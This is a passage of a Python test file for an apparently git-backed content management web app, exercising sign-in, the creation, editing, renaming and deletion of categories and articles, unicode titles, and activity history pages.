fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# start a new branch via the http interface
# invokes view_functions/get_repo which creates a clone
task_description = u'eviscerate a salmon for baby grizzly bears'
working_branch = repo_functions.get_start_branch(self.clone1, 'master', task_description, fake_author_email)
self.assertTrue(working_branch.name in self.clone1.branches)
self.assertTrue(working_branch.name in self.origin.branches)
working_branch_name = working_branch.name
working_branch.checkout()
# create a new article
art_title = u'快速狐狸'
art_slug = slugify(art_title)
response = self.test_client.post('/tree/{}/edit/'.format(working_branch_name), data={'action': 'create', 'create_what': constants.ARTICLE_LAYOUT, 'request_path': art_title}, follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format(u'article-edit') in response.data.decode('utf-8'))
# pull the changes
self.clone1.git.pull('origin', working_branch_name)
# a directory was created
dir_location = join(self.clone1.working_dir, art_slug)
idx_location = u'{}/index.{}'.format(dir_location, constants.CONTENT_FILE_EXTENSION)
self.assertTrue(exists(dir_location) and isdir(dir_location))
# an index page was created inside
self.assertTrue(exists(idx_location))
# the directory and index page pass the article test
self.assertTrue(view_functions.is_article_dir(dir_location))
# the title saved in the index front matter is the same text that was used to create the article
self.assertEqual(view_functions.get_value_from_front_matter('title', idx_location), art_title)
# the title saved in the index front matter is displayed on the article list page
response = self.test_client.get('/tree/{}/edit/'.format(working_branch_name), follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format(u'articles-list') in response.data.decode('utf-8'))
self.assertTrue(PATTERN_BRANCH_COMMENT.format(working_branch_name) in response.data.decode('utf-8'))
self.assertTrue(PATTERN_FILE_COMMENT.format(**{"file_name": art_slug, "file_title": art_title, "file_type": constants.ARTICLE_LAYOUT}) in response.data.decode('utf-8'))
# in TestApp
def test_save_non_roman_characters_to_article(self):
''' Adding non-roman characters to an article's title and body raises no unicode errors.
'''
with HTTMock(self.auth_csv_example_allowed):
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in('erica@example.com')
# Start a new task, topic, subtopic, article
erica.open_link(constants.ROUTE_ACTIVITY)
args = 'Mermithergate for Ant Worker', 'Enoplia Nematode', 'Genus Mermis', 'Cephalotes Atratus'
erica.quick_activity_setup(*args)
# Edit the new article and give it a non-roman character title
erica.edit_article(u'快速狐狸', u'Myrmeconema ੯ूᵕू ໒꒱ƶƵ Neotropicum')
# in TestApp
def test_sign_in_with_email_containing_non_roman_characters(self):
''' Adding non-roman characters to the sign-in email raises no errors.
'''
with HTTMock(self.auth_csv_example_allowed):
with HTTMock(self.mock_persona_verify_non_roman):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in('੯ूᵕू ໒꒱ƶƵ@快速狐狸.com')
# in TestApp
def test_new_item_has_name_and_title(self):
''' A slugified directory name and display title are created when a new category or article is created.
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# start a new branch via the http interface
# invokes view_functions/get_repo which creates a clone
task_description = u'eviscerate a salmon for baby grizzly bears'
working_branch = repo_functions.get_start_branch(self.clone1, 'master', task_description, fake_author_email)
self.assertTrue(working_branch.name in self.clone1.branches)
self.assertTrue(working_branch.name in self.origin.branches)
working_branch_name = working_branch.name
working_branch.checkout()
# create a new category
cat_title = u'grrowl!! Yeah'
cat_slug = slugify(cat_title)
response = self.test_client.post('/tree/{}/edit/'.format(working_branch_name),
data={'action': 'create', 'create_what': constants.CATEGORY_LAYOUT, 'request_path': cat_title},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# pull the changes
self.clone1.git.pull('origin', working_branch_name)
# a directory was created
dir_location = join(self.clone1.working_dir, cat_slug)
idx_location = u'{}/index.{}'.format(dir_location, constants.CONTENT_FILE_EXTENSION)
self.assertTrue(exists(dir_location) and isdir(dir_location))
# an index page was created inside
self.assertTrue(exists(idx_location))
# the directory and index page pass the category test
self.assertTrue(view_functions.is_category_dir(dir_location))
# the title saved in the index front matter is the same text that was used to create the category
self.assertEqual(view_functions.get_value_from_front_matter('title', idx_location), cat_title)
# the title saved in the index front matter is displayed on the article list page
response = self.test_client.get('/tree/{}/edit/'.format(working_branch_name), follow_redirects=True)
self.assertTrue(PATTERN_FILE_COMMENT.format(**{"file_name": cat_slug, "file_title": cat_title, "file_type": constants.CATEGORY_LAYOUT}) in response.data)
# create a new article
art_title = u'快速狐狸'
art_slug = slugify(art_title)
response = self.test_client.post('/tree/{}/edit/'.format(working_branch_name), data={'action': 'create', 'create_what': constants.ARTICLE_LAYOUT, 'request_path': art_title}, follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format(u'article-edit') in response.data.decode('utf-8'))
# pull the changes
self.clone1.git.pull('origin', working_branch_name)
# a directory was created
dir_location = join(self.clone1.working_dir, art_slug)
idx_location = u'{}/index.{}'.format(dir_location, constants.CONTENT_FILE_EXTENSION)
self.assertTrue(exists(dir_location) and isdir(dir_location))
# an index page was created inside
self.assertTrue(exists(idx_location))
# the directory and index page pass the article test
self.assertTrue(view_functions.is_article_dir(dir_location))
# the title saved in the index front matter is the same text that was used to create the article
self.assertEqual(view_functions.get_value_from_front_matter('title', idx_location), art_title)
# the title saved in the index front matter is displayed on the article list page
response = self.test_client.get('/tree/{}/edit/'.format(working_branch_name), follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format(u'articles-list') in response.data.decode('utf-8'))
self.assertTrue(PATTERN_BRANCH_COMMENT.format(working_branch_name) in response.data.decode('utf-8'))
self.assertTrue(PATTERN_FILE_COMMENT.format(**{"file_name": art_slug, "file_title": art_title, "file_type": constants.ARTICLE_LAYOUT}) in response.data.decode('utf-8'))
# in TestApp
def test_edit_category_title_and_description(self):
''' A category's title and description can be edited.
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# start a new branch via the http interface
# invokes view_functions/get_repo which creates a clone
task_description = u'rapidly discharge black ink into the mantle cavity for squids'
working_branch = repo_functions.get_start_branch(self.clone1, 'master', task_description, fake_author_email)
self.assertTrue(working_branch.name in self.clone1.branches)
self.assertTrue(working_branch.name in self.origin.branches)
working_branch_name = working_branch.name
working_branch.checkout()
# create a categories directory
categories_slug = u'categories'
response = self.test_client.post('/tree/{}/edit/'.format(working_branch_name),
data={'action': 'create', 'create_what': constants.CATEGORY_LAYOUT, 'request_path': categories_slug},
follow_redirects=True)
# and put a new category inside it
cat_title = u'Bolus'
cat_slug = slugify(cat_title)
response = self.test_client.post('/tree/{}/edit/{}'.format(working_branch_name, categories_slug),
data={'action': 'create', 'create_what': constants.CATEGORY_LAYOUT, 'request_path': cat_title},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# pull the changes
self.clone1.git.pull('origin', working_branch_name)
# get the hexsha
hexsha = self.clone1.commit().hexsha
# get the modify page and verify that the form renders with the correct values
cat_path = join(categories_slug, cat_slug, u'index.{}'.format(constants.CONTENT_FILE_EXTENSION))
response = self.test_client.get('/tree/{}/edit/{}'.format(working_branch_name, cat_path), follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(PATTERN_FORM_CATEGORY_TITLE.format(title=cat_title) in response.data)
self.assertTrue(PATTERN_FORM_CATEGORY_DESCRIPTION.format(description=u'') in response.data)
# now save a new title and description for the category
new_cat_title = u'Caecum'
cat_description = u'An intraperitoneal pouch, that is considered to be the beginning of the large intestine.'
response = self.test_client.post('/tree/{}/edit/{}'.format(working_branch_name, cat_path),
data={'layout': constants.CATEGORY_LAYOUT, 'hexsha': hexsha, 'url-slug': u'{}/{}/'.format(categories_slug, cat_slug),
'en-title': new_cat_title, 'en-description': cat_description, 'order': u'0', 'action': u'save_category'},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# check the returned HTML for the description and title values (format will change as pages are designed)
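# unescape HTML-encoded apostrophes (&#39;) in the response before matching the expected strings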
response_data = sub('&#39;', '\'', response.data.decode('utf-8'))
self.assertTrue(PATTERN_FLASH_SAVED_CATEGORY.format(title=new_cat_title) in response_data)
self.assertTrue(PATTERN_FORM_CATEGORY_DESCRIPTION.format(description=cat_description) in response_data)
self.assertTrue(PATTERN_FORM_CATEGORY_TITLE.format(title=new_cat_title) in response_data)
# pull the changes
self.clone1.git.pull('origin', working_branch_name)
# a directory was created
dir_location = join(self.clone1.working_dir, categories_slug, cat_slug)
idx_location = u'{}/index.{}'.format(dir_location, constants.CONTENT_FILE_EXTENSION)
self.assertTrue(exists(dir_location) and isdir(dir_location))
# an index page was created inside
self.assertTrue(exists(idx_location))
# the directory and index page pass the category test
self.assertTrue(view_functions.is_category_dir(dir_location))
# the title and description saved in the index front matter are the same text that was used to save the category
self.assertEqual(view_functions.get_value_from_front_matter('title', idx_location), new_cat_title)
self.assertEqual(view_functions.get_value_from_front_matter('description', idx_location), cat_description)
# the title saved in the index front matter is displayed on the article list page
response = self.test_client.get('/tree/{}/edit/{}'.format(working_branch_name, categories_slug), follow_redirects=True)
self.assertTrue(PATTERN_FILE_COMMENT.format(**{"file_name": cat_slug, "file_title": new_cat_title, "file_type": constants.CATEGORY_LAYOUT}) in response.data)
# in TestApp
def test_delete_category(self):
''' A category can be deleted
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# start a new branch via the http interface
# invokes view_functions/get_repo which creates a clone
task_description = u'clasp with front legs and draw up the hind end for geometridae'
working_branch = repo_functions.get_start_branch(self.clone1, 'master', task_description, fake_author_email)
self.assertTrue(working_branch.name in self.clone1.branches)
self.assertTrue(working_branch.name in self.origin.branches)
working_branch_name = working_branch.name
working_branch.checkout()
# create a categories directory
categories_slug = u'categories'
response = self.test_client.post('/tree/{}/edit/'.format(working_branch_name),
data={'action': 'create', 'create_what': constants.CATEGORY_LAYOUT, 'request_path': categories_slug},
follow_redirects=True)
# and put a new category inside it
cat_title = u'Soybean Looper'
cat_slug = slugify(cat_title)
response = self.test_client.post('/tree/{}/edit/{}'.format(working_branch_name, categories_slug),
data={'action': 'create', 'create_what': constants.CATEGORY_LAYOUT, 'request_path': cat_title},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# pull the changes
self.clone1.git.pull('origin', working_branch_name)
# get the hexsha
hexsha = self.clone1.commit().hexsha
# now delete the category
cat_description = u''
url_slug = u'{}/{}/'.format(categories_slug, cat_slug)
response = self.test_client.post('/tree/{}/edit/{}'.format(working_branch_name, url_slug.rstrip('/')),
data={'layout': constants.CATEGORY_LAYOUT, 'hexsha': hexsha, 'url-slug': url_slug,
'en-title': cat_title, 'en-description': cat_description, 'order': u'0',
'action': u'delete_category'},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# check the returned HTML for the description and title values (format will change as pages are designed)
soup = BeautifulSoup(response.data)
self.assertEqual(PATTERN_FLASH_DELETED_CATEGORY.format(title=cat_title, containing=u''), soup.find('li', class_='flash').text)
# pull the changes
self.clone1.git.pull('origin', working_branch_name)
# the directory was deleted
dir_location = join(self.clone1.working_dir, categories_slug, cat_slug)
self.assertFalse(exists(dir_location) and isdir(dir_location))
# the title is not displayed on the article list page
response = self.test_client.get('/tree/{}/edit/{}'.format(working_branch_name, categories_slug), follow_redirects=True)
self.assertFalse(PATTERN_FILE_COMMENT.format(file_name=cat_slug, file_title=cat_title, file_type=constants.CATEGORY_LAYOUT) in response.data)
# in TestApp
def test_set_and_retrieve_order_and_description(self):
''' Order and description can be set to and retrieved from an article's or category's front matter.
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# start a new branch via the http interface
# invokes view_functions/get_repo which creates a clone
task_description = u'regurgitate partially digested worms and grubs for baby birds'
working_branch = repo_functions.get_start_branch(self.clone1, 'master', task_description, fake_author_email)
self.assertTrue(working_branch.name in self.clone1.branches)
self.assertTrue(working_branch.name in self.origin.branches)
working_branch_name = working_branch.name
working_branch.checkout()
# create a categories directory
categories_slug = u'categories'
response = self.test_client.post('/tree/{}/edit/'.format(working_branch_name),
data={'action': 'create', 'create_what': constants.CATEGORY_LAYOUT, 'request_path': categories_slug},
follow_redirects=True)
# and put a new category inside it
cat_title = u'Small Intestine'
cat_slug = slugify(cat_title)
response = self.test_client.post('/tree/{}/edit/{}'.format(working_branch_name, categories_slug),
data={'action': 'create', 'create_what': constants.CATEGORY_LAYOUT, 'request_path': cat_title},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# pull the changes
self.clone1.git.pull('origin', working_branch_name)
# get the hexsha
hexsha = self.clone1.commit().hexsha
# now save some values into the category's index page's front matter
new_cat_title = u'The Small Intestine'
cat_description = u'The part of the GI tract following the stomach and followed by the large intestine where much of the digestion and absorption of food takes place.'
cat_order = 3
cat_path = join(categories_slug, cat_slug, u'index.{}'.format(constants.CONTENT_FILE_EXTENSION))
response = self.test_client.post('/tree/{}/edit/{}'.format(working_branch_name, cat_path),
data={'layout': constants.CATEGORY_LAYOUT, 'hexsha': hexsha,
'en-title': new_cat_title, 'en-description': cat_description,
'order': cat_order, 'action': u'save_category'},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# check the returned HTML for the description and order values (format will change as pages are designed)
soup = BeautifulSoup(response.data)
self.assertEqual(soup.find('textarea', {'name': 'en-description'}).text, cat_description)
self.assertEqual(int(soup.find('input', {'name': 'order'})['value']), cat_order)
# pull the changes
self.clone1.git.pull('origin', working_branch_name)
# a directory was created
dir_location = join(self.clone1.working_dir, categories_slug, cat_slug)
idx_location = u'{}/index.{}'.format(dir_location, constants.CONTENT_FILE_EXTENSION)
self.assertTrue(exists(dir_location) and isdir(dir_location))
# an index page was created inside
self.assertTrue(exists(idx_location))
# the directory and index page pass the category test
self.assertTrue(view_functions.is_category_dir(dir_location))
# the title saved in the index front matter is the same text that was used to create the category
self.assertEqual(view_functions.get_value_from_front_matter('title', idx_location), new_cat_title)
# check order and description
self.assertEqual(view_functions.get_value_from_front_matter('order', idx_location), cat_order)
self.assertEqual(view_functions.get_value_from_front_matter('description', idx_location), cat_description)
# the title saved in the index front matter is displayed on the article list page
response = self.test_client.get('/tree/{}/edit/{}'.format(working_branch_name, categories_slug), follow_redirects=True)
self.assertTrue(PATTERN_FILE_COMMENT.format(**{"file_name": cat_slug, "file_title": new_cat_title, "file_type": constants.CATEGORY_LAYOUT}) in response.data)
# in TestApp
def test_column_navigation_structure(self):
''' The column navigation structure matches the structure of the site.
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# start a new branch via the http interface
# invokes view_functions/get_repo which creates a clone
task_description = u'force a clam shell open for starfish'
working_branch = repo_functions.get_start_branch(self.clone1, 'master', task_description, fake_author_email)
self.assertTrue(working_branch.name in self.clone1.branches)
self.assertTrue(working_branch.name in self.origin.branches)
working_branch_name = working_branch.name
working_branch.checkout()
# create some nested categories
slug_hello = u'hello'
response = self.test_client.post('/tree/{}/edit/'.format(working_branch_name),
data={'action': 'create', 'create_what': constants.CATEGORY_LAYOUT, 'request_path': slug_hello},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
slug_world = u'world'
response = self.test_client.post('/tree/{}/edit/{}'.format(working_branch_name, slug_hello),
data={'action': 'create', 'create_what': constants.CATEGORY_LAYOUT, 'request_path': slug_world},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
slug_how = u'how'
response = self.test_client.post('/tree/{}/edit/{}'.format(working_branch_name, sep.join([slug_hello, slug_world])),
data={'action': 'create', 'create_what': constants.CATEGORY_LAYOUT, 'request_path': slug_how},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
slug_are = u'are'
response = self.test_client.post('/tree/{}/edit/{}'.format(working_branch_name, sep.join([slug_hello, slug_world, slug_how])),
data={'action': 'create', 'create_what': constants.CATEGORY_LAYOUT, 'request_path': slug_are},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# pull the changes
self.clone1.git.pull('origin', working_branch_name)
# get the columns
dir_columns = view_functions.make_directory_columns(self.clone1, working_branch_name, sep.join([slug_hello, slug_world, slug_how, slug_are]))
# test that the contents match our expectations
self.assertEqual(len(dir_columns), 4)
self.assertEqual(len(dir_columns[0]['files']), 7)
expected = {'hello': u'category', 'img': u'folder', 'index.md': u'file', 'other': u'folder', 'other.md': u'file', 'sub': u'folder', 'test-articles': u'folder'}
for item in dir_columns[0]['files']:
self.assertTrue(item['name'] in expected)
self.assertTrue(expected[item['name']] == item['display_type'])
self.assertTrue(dir_columns[1]['files'][0]['name'] == slug_world)
self.assertTrue(dir_columns[2]['files'][0]['name'] == slug_how)
self.assertTrue(dir_columns[3]['files'][0]['name'] == slug_are)
# in TestApp
def test_activity_overview_page_is_accurate(self):
''' The activity history page accurately displays the activity history
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# start a new branch via the http interface
# invokes view_functions/get_repo which creates a clone
task_description = u'deposit eggs in a syconium for fig wasp larvae'
working_branch = repo_functions.get_start_branch(self.clone1, 'master', task_description, fake_author_email)
self.assertTrue(working_branch.name in self.clone1.branches)
self.assertTrue(working_branch.name in self.origin.branches)
working_branch_name = working_branch.name
working_branch.checkout()
title_fig_zh = u'无花果'
slug_fig_zh = u'wu-hua-guo'
title_syconium = u'Syconium'
slug_syconium = u'syconium'
title_ostiole = u'Ostiole'
title_fig_en = u'Fig'
title_fig_bn = u'Dumur'
create_details = [
(u'', title_fig_zh, constants.CATEGORY_LAYOUT),
(slug_fig_zh, title_syconium, constants.CATEGORY_LAYOUT),
(u'{}/{}'.format(slug_fig_zh, slug_syconium), title_ostiole, constants.ARTICLE_LAYOUT),
(u'', title_fig_en, constants.CATEGORY_LAYOUT),
(u'', title_fig_bn, constants.CATEGORY_LAYOUT)
]
for detail in create_details:
response = self.test_client.post('/tree/{}/edit/{}'.format(working_branch_name, detail[0]),
data={'action': 'create', 'create_what': detail[2], 'request_path': detail[1]},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# add a comment
comment_text = u'The flowers provide a safe haven and nourishment for the next generation of wasps. ᙙᙖ'
response = self.test_client.post('/tree/{}/'.format(working_branch_name),
data={'comment': 'Comment', 'comment_text': comment_text},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# delete a topic
response = self.test_client.post('/tree/{}/edit/{}'.format(working_branch_name, slug_fig_zh),
data={'action': 'delete_category'},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# get the activity history page
response = self.test_client.get('/tree/{}/'.format(working_branch_name), follow_redirects=True)
# TODO: for some reason (encoding?) my double-quotes are being replaced by &#34; in the returned HTML
response_data = sub('&#34;', '"', response.data.decode('utf-8'))
# make sure everything we did above is shown on the activity page
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format('activity-overview') in response_data)
self.assertTrue(PATTERN_OVERVIEW_ACTIVITY_STARTED.format(activity_name=task_description, author_email=fake_author_email) in response_data)
self.assertTrue(PATTERN_OVERVIEW_COMMENT_BODY.format(comment_body=comment_text) in response_data)
self.assertTrue(PATTERN_OVERVIEW_ITEM_DELETED.format(deleted_name=title_fig_zh, deleted_type=view_functions.file_display_name(constants.CATEGORY_LAYOUT), deleted_also=u'(containing 1 topic and 1 article) ', author_email=fake_author_email) in response_data)
for detail in create_details:
self.assertTrue(PATTERN_OVERVIEW_ITEM_CREATED.format(created_name=detail[1], created_type=detail[2], author_email=fake_author_email) in response_data)
# in TestApp
def test_activity_history_summary_accuracy(self):
''' The summary of an activity's history is displayed as expected.
'''
with HTTMock(self.auth_csv_example_allowed):
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.test_client, self)
erica.sign_in(email='erica@example.com')
# Start a new task
erica.open_link(constants.ROUTE_ACTIVITY)
erica.start_task(description=u'Parasitize with Ichneumonidae for Moth Larvae')
# Get the branch name
branch_name = erica.get_branch_name()
# Load the "other" folder
erica.open_link(url='/tree/{}/edit/other/'.format(branch_name))
# Create a category, sub-category, article
category_name = u'Antennae Segments'
subcategory_name = u'Short Ovipositors'
article_names = [u'Inject Eggs Directly Into a Host Body', u'A Technique Of Celestial Navigation Called Transverse Orientation']
erica.add_category(category_name=category_name)
erica.add_subcategory(subcategory_name=subcategory_name)
subcategory_path = erica.path
erica.add_article(article_name=article_names[0])
# edit the article
erica.edit_article(title_str=article_names[0], body_str=u'Inject venom along with the egg')
# create another article and delete it
erica.open_link(subcategory_path)
erica.add_article(article_name=article_names[1])
erica.open_link(subcategory_path)
erica.delete_article(article_names[1])
# Load the activity overview page
erica.open_link(url='/tree/{}/'.format(branch_name))
# there is a summary
summary_div = erica.soup.find("div", {"data-test-id": "summary-div"})
self.assertIsNotNone(summary_div)
# it's right about what's changed
self.assertIsNotNone(summary_div.find(lambda tag: bool(tag.name == 'p' and '2 articles and 2 topics' in tag.text)))
# grab all the list items
check_rows = summary_div.find_all('li')
# the link to create a new change
change_row = check_rows.pop()
self.assertIsNotNone(change_row.find("a", {"data-test-id": "change-link"}))
self.assertEqual(change_row.find("a", {"data-test-id": "change-link"}).text, constants.TEXT_ADD_CHANGE)
# make sure the list items match what we did above
category_row = check_rows.pop()
self.assertIsNotNone(category_row.find("a", {"data-test-id": "change-link"}))
self.assertEqual(category_row.find('h3', {"data-test-id": "change-title"}).text, category_name)
self.assertEqual(category_row.find('div', {"data-test-id": "change-display-type"}).text, constants.LAYOUT_DISPLAY_LOOKUP[constants.CATEGORY_LAYOUT].title())
self.assertEqual(category_row.find('p', {"data-test-id": "change-actions"}).text, u'Created')
subcategory_row = check_rows.pop()
self.assertIsNotNone(subcategory_row.find("a", {"data-test-id": "change-link"}))
self.assertEqual(subcategory_row.find('h3', {"data-test-id": "change-title"}).text, subcategory_name)
self.assertEqual(subcategory_row.find('div', {"data-test-id": "change-display-type"}).text, constants.LAYOUT_DISPLAY_LOOKUP[constants.CATEGORY_LAYOUT].title())
self.assertEqual(subcategory_row.find('p', {"data-test-id": "change-actions"}).text, u'Created')
article_1_row = check_rows.pop()
self.assertIsNotNone(article_1_row.find("a", {"data-test-id": "change-link"}))
self.assertEqual(article_1_row.find('h3', {"data-test-id": "change-title"}).text, article_names[0])
self.assertEqual(article_1_row.find('div', {"data-test-id": "change-display-type"}).text, constants.LAYOUT_DISPLAY_LOOKUP[constants.ARTICLE_LAYOUT].title())
self.assertEqual(article_1_row.find('p', {"data-test-id": "change-actions"}).text, u'Created, Edited')
article_2_row = check_rows.pop()
self.assertIsNone(article_2_row.find("a", {"data-test-id": "change-link"}))
self.assertIsNone(article_2_row.find('h3', {"data-test-id": "change-title"}).find('a'))
self.assertEqual(article_2_row.find('h3', {"data-test-id": "change-title"}).text, article_names[1])
self.assertEqual(article_2_row.find('div', {"data-test-id": "change-display-type"}).text, constants.LAYOUT_DISPLAY_LOOKUP[constants.ARTICLE_LAYOUT].title())
self.assertEqual(article_2_row.find('p', {"data-test-id": "change-actions"}).text, u'Created, Deleted')
# no rows left
self.assertEqual(len(check_rows), 0)
# in TestApp
def test_create_page_creates_directory_containing_index(self):
''' Creating a new page creates a directory with an editable index file inside.
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# start a new branch via the http interface
# invokes view_functions/get_repo which creates a clone
task_description = u'filter plankton from sea water for humpback whales'
working_branch = repo_functions.get_start_branch(self.clone1, 'master', task_description, fake_author_email)
self.assertTrue(working_branch.name in self.clone1.branches)
self.assertTrue(working_branch.name in self.origin.branches)
working_branch_name = working_branch.name
working_branch.checkout()
# create a new page
page_slug = u'hello'
page_path = u'{}/index.{}'.format(page_slug, constants.CONTENT_FILE_EXTENSION)
response = self.test_client.post('/tree/{}/edit/'.format(working_branch_name),
data={'action': 'create', 'create_what': constants.ARTICLE_LAYOUT, 'request_path': page_slug},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(page_path in response.data)
# pull the changes
self.clone1.git.pull('origin', working_branch_name)
# a directory was created
dir_location = join(self.clone1.working_dir, page_slug)
idx_location = u'{}/index.{}'.format(dir_location, constants.CONTENT_FILE_EXTENSION)
self.assertTrue(exists(dir_location) and isdir(dir_location))
# an index page was created inside
self.assertTrue(exists(idx_location))
# the directory and index page pass the article test
self.assertTrue(view_functions.is_article_dir(dir_location))
# in TestApp
def test_can_rename_editable_directories(self):
''' Can rename an editable directory.
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# start a new branch via the http interface
# invokes view_functions/get_repo which creates a clone
task_description = u'filter plankton from sea water for humpback whales'
working_branch = repo_functions.get_start_branch(self.clone1, 'master', task_description, fake_author_email)
self.assertTrue(working_branch.name in self.clone1.branches)
self.assertTrue(working_branch.name in self.origin.branches)
working_branch_name = working_branch.name
working_branch.checkout()
# create a new page
page_slug = u'hello'
page_path = u'{}/index.{}'.format(page_slug, constants.CONTENT_FILE_EXTENSION)
response = self.test_client.post('/tree/{}/edit/'.format(working_branch_name),
data={'action': 'create', 'create_what': constants.ARTICLE_LAYOUT, 'request_path': page_slug},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(page_path in response.data)
hexsha = search(r'<input name="hexsha" value="(\w+)"', response.data).group(1)
# now save the file with new content
new_page_slug = u'goodbye'
new_page_path = u'{}/index.{}'.format(new_page_slug, constants.CONTENT_FILE_EXTENSION)
response = self.test_client.post('/tree/{}/save/{}'.format(working_branch_name, page_path),
data={'layout': constants.ARTICLE_LAYOUT, 'hexsha': hexsha,
'en-title': u'',
'en-body': u'',
'fr-title': u'', 'fr-body': u'',
'url-slug': u'{}'.format(new_page_slug)},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(new_page_path in response.data)
# pull the changes
self.clone1.git.pull('origin', working_branch_name)
# the old directory is gone
old_dir_location = join(self.clone1.working_dir, page_slug)
self.assertFalse(exists(old_dir_location))
# the new directory exists and is properly structured
new_dir_location = join(self.clone1.working_dir, new_page_slug)
self.assertTrue(exists(new_dir_location) and isdir(new_dir_location))
# an index page is inside
idx_location = u'{}/index.{}'.format(new_dir_location, constants.CONTENT_FILE_EXTENSION)
self.assertTrue(exists(idx_location))
# the directory and index page pass the editable test
self.assertTrue(view_functions.is_article_dir(new_dir_location))
# in TestApp
def test_cannot_move_a_directory_inside_itself(self):
''' Can't rename an editable directory in a way which moves it inside itself
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# start a new branch via the http interface
# invokes view_functions/get_repo which creates a clone
task_description = u'filter plankton from sea water for humpback whales'
working_branch = repo_functions.get_start_branch(self.clone1, 'master', task_description, fake_author_email)
self.assertTrue(working_branch.name in self.clone1.branches)
self.assertTrue(working_branch.name in self.origin.branches)
working_branch_name = working_branch.name
working_branch.checkout()
# create a new page
page_slug = u'hello'
page_path = u'{}/index.{}'.format(page_slug, constants.CONTENT_FILE_EXTENSION)
response = self.test_client.post('/tree/{}/edit/'.format(working_branch_name),
data={'action': 'create', 'create_what': constants.ARTICLE_LAYOUT, 'request_path': page_slug},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(page_path in response.data)
hexsha = search(r'<input name="hexsha" value="(\w+)"', response.data).group(1)
# now save the file with new content
new_page_slug = u'hello/is/better/than/goodbye'
new_page_path = u'{}/index.{}'.format(new_page_slug, constants.CONTENT_FILE_EXTENSION)
response = self.test_client.post('/tree/{}/save/{}'.format(working_branch_name, page_path),
data={'layout': constants.ARTICLE_LAYOUT, 'hexsha': hexsha,
'en-title': u'',
'en-body': u'',
'fr-title': u'', 'fr-body': u'',
'url-slug': u'{}'.format(new_page_slug)},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# the new page shouldn't have been created
self.assertFalse(new_page_path in response.data)
# there should be a flashed error message
self.assertTrue(u'I cannot move a directory inside itself!' in response.data)
# pull the changes
self.clone1.git.pull('origin', working_branch_name)
# the old directory is not gone
old_dir_location = join(self.clone1.working_dir, page_slug)
self.assertTrue(exists(old_dir_location))
# the new directory doesn't exist
new_dir_location = join(self.clone1.working_dir, new_page_slug)
self.assertFalse(exists(new_dir_location) and isdir(new_dir_location))
# in TestApp
def test_editable_directories_are_shown_as_articles(self):
''' Editable directories (directories containing only an editable index file) are displayed as articles.
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# start a new branch via the http interface
# invokes view_functions/get_repo which creates a clone
task_description = u'filter plankton from sea water for humpback whales'
working_branch = repo_functions.get_start_branch(self.clone1, 'master', task_description, fake_author_email)
self.assertTrue(working_branch.name in self.clone1.branches)
self.assertTrue(working_branch.name in self.origin.branches)
working_branch_name = working_branch.name
working_branch.checkout()
# create a new page
page_slug = u'hello'
